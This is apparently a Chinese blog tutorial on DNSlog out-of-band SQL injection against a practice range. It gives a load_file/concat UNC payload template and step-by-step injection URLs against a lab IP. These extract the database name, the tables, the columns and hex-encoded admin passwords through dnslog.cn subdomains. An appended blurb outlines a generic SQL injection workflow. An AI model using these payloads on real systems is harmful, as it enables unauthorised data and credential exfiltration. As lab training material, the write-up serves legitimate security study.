DNSlog注入学习(靶场测试全流程)

原理:
首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。

DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息
简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息

利用场景:
在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。

推荐使用网站 :http://dnslog.cn/
在这里插入图片描述
首先点击Get SubDomain按钮,网页会生成一个域名。
在这里插入图片描述
我们在对生成的域名进行访问后再点击右边的按钮,就可以在下方看到访问记录,也就是DNS解析的日志信息。
在这里插入图片描述

注入流程(确定注入点后):
1、先查出我们想要的内容
sql语句查出我们想要的内容
如:数据库内管理员的账户密码
用户的联系方式 等等
select database();

2、拼接域名
我们想要的东西.gfholg.dnslog.cn
select concat(‘a’,‘b’);
select concat((select database()),’.gfholg.dnslog.cn’);
我们想要的东西.gfholg.dnslog.cn

3、让目标访问
load_file() 读取文件
读取本地文件
C:\target\xunlainying\WWW\1.txt
select load_file(‘C:/target/xunlainying/WWW/1.txt’);

读取远程文件
unc
//mss.zkaq.com/1.txt

例子:
select load_file(concat(’//’,(select database()),’.6g05at.dnslog.cn/123’));
模板:
select load_file(concat(’//’,(sql 查询语句),’.dnslog.cn得到的域名/123’));

靶场实战(封神台)
在这里插入图片描述
1.这是目标网站:
在这里插入图片描述
2.and 1=1没有报错
在这里插入图片描述
3.and 1=2报错,确认有注入点
在这里插入图片描述
4.到dnslog.cn获取一个域名
在这里插入图片描述
5.拼接语句,先查询数据库
这是模板;
load_file(concat(’//’,(sql 查询语句),’.dnslog.cn得到的域名/123’));

查询数据库的语句是:
select database()

dnslog.cn得到的域名是:gkz5eq.dnslog.cn

拼接好的语句为:
load_file(concat(’//’,(select database()),’.gkz5eq.dnslog.cn/123’));

6.使用拼接好的语句进行测试:

http://59.63.200.79:8022/dns/?id=1 and load_file(concat(’//’,(select database()),’.gkz5eq.dnslog.cn/123’));

在这里插入图片描述
7.返回查看dnslog.cn中的日志,maoshe就是我们查询出的数据库名:
在这里插入图片描述
8.查表(我不小心点到了刷新,就重新生成了一个域名,域名部分忽略就行)

http://59.63.200.79:8022/dns/?id=1 and load_file(concat(’//’,(select table_name from information_schema.tables where table_schema=‘maoshe’ limit 0,1),’.ltofie.dnslog.cn/123’));

在这里插入图片描述
将limit 0,1 改成limit 1,1 后,发现第二个表
在这里插入图片描述
一共两个表 admin 和 news
9.先查admin表的列,同样改变limit 后的第一个参数,查询多个列

http://59.63.200.79:8022/dns/?id=1%20and%20load_file(concat(%27//%27,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27maoshe%27%20and%20table_name=%27admin%27limit%200,1),%27.ltofie.dnslog.cn/123%27));

在这里插入图片描述
发现有id username password 三个列

10.猜测flag在passwrd中,查询数据

http://59.63.200.79:8022/dns/?id=1%20and%20load_file(concat(%27//%27,(select%20hex(password)%20from%20admin%20limit%200,1),%27.7msbrv.dnslog.cn/123%27));
在这里插入图片描述
将十六进制数转为字符串,得到123admin,显然不是flag,继续查询
在这里插入图片描述
将十六进制数转为字符串,得到test123显然不是flag,继续查询
在这里插入图片描述

将十六进制数转为字符串,得到FlaG-biubiu,发现falg。
在这里插入图片描述

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PentesterLab靶场的SQL注入流程可以按照以下步骤进行: 1. 首先,我们需要找到一个存在SQL注入漏洞的目标网站。可以使用工具或手动查找目标网站。 2. 一旦找到目标网站,我们可以使用不同的注入技术进行测试。在引用\[1\]和\[2\]中提供的案例中,可以尝试使用报错注入和联合查询注入。 3. 对于报错注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以触发错误并获取数据库信息。例如,在引用\[1\]中提供的案例中,我们可以尝试使用updatexml函数来获取数据库名称。 4. 对于联合查询注入,我们可以尝试在URL参数中插入一些特殊字符和SQL语句,以执行额外的查询并获取数据库信息。例如,在引用\[2\]中提供的案例中,我们可以尝试使用UNION SELECT语句来获取额外的数据列。 5. 如果我们成功地发现了SQL注入漏洞并获取了数据库信息,我们可以使用工具如sqlmap来自动化注入过程,以获取更多的数据库信息。 6. 最后,我们可以根据获取的数据库信息来进一步探索和利用漏洞,以达到我们的渗透测试目标。 请注意,进行SQL注入测试时,应遵循合法和道德的原则,并获得合法的授权。 #### 引用[.reference_title] - *1* *2* [PentesterLab靶场sql注入流程](https://blog.csdn.net/m0_37570494/article/details/122727777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [一次简单的SQL注入靶场练习](https://blog.csdn.net/lza20001103/article/details/125958035)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值